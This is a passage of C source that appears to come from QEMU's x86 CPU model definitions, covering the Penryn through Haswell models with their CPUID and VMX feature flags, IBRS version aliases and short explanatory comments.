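 * returned to guests as the 48-byte brand string in CPUID leaves
 * 0x80000002..0x80000004, .level caps the highest basic leaf reported in
 * CPUID.00H:EAX, and .xlevel the highest extended leaf in
 * CPUID.80000000H:EAX; the pre-brand-string models above (486, pentium,
 * pentium2, pentium3) therefore leave .xlevel = 0 and .model_id empty.
 */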
CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING, .xlevel = 0x80000008, .model_id = "Intel Core 2 Duo P9xxx (Penryn Class Core 2)", }, { .name = "Nehalem", .level = 11, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 26, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | 
VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID, .xlevel = 0x80000008, .model_id = "Intel Core i7 9xx (Nehalem Class Core i7)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Nehalem-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Core i7 9xx (Nehalem Core i7, IBRS update)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Westmere", .level = 11, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 44, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | 
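/*
 * How the .versions arrays are meant to be read (a sketch under the usual
 * QEMU semantics, not the literal upstream apply loop): version 1 is the
 * base model, and each later X86CPUVersionDefinition layers its PropValue
 * list on top, so "Nehalem-v2" is Nehalem plus spec-ctrl=on and a new
 * model-id, reachable either as "Nehalem-v2" or via its .alias
 * "Nehalem-IBRS". Applying a version amounts to something like:
 *
 *     for (const PropValue *pv = vdef->props; pv && pv->prop; pv++)
 *         set_cpu_prop(cpu, pv->prop, pv->value);   -- hypothetical helper
 *
 * with both the version list and each props list terminated by a zeroed
 * entry, as the explicit end-of-list markers show.
 */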
VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST, .xlevel = 0x80000008, .model_id = "Westmere E56xx/L56xx/X56xx (Nehalem-C)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Westmere-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Westmere E56xx/L56xx/X56xx (IBRS update)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "SandyBridge", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 42, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | 
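/*
 * Aside (illustrative): models that expose XSAVE (CPUID_EXT_XSAVE plus a
 * FEAT_XSAVE word, e.g. SandyBridge above) also raise .level to 0xd, because
 * XSAVE state-component enumeration lives in CPUID leaf 0DH and a lower
 * .level would hide that leaf from guests.
 */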
VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST, .xlevel = 0x80000008, .model_id = "Intel Xeon E312xx (Sandy Bridge)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "SandyBridge-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Xeon E312xx (Sandy Bridge, IBRS update)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "IvyBridge", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 58, .stepping = 9, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_ERMS, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | 
VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING, .xlevel = 0x80000008, .model_id = "Intel Xeon E3-12xx v2 (Ivy Bridge)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "IvyBridge-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Xeon E3-12xx v2 (Ivy Bridge, IBRS)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Haswell", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 60, .stepping = 4, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | 
VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | 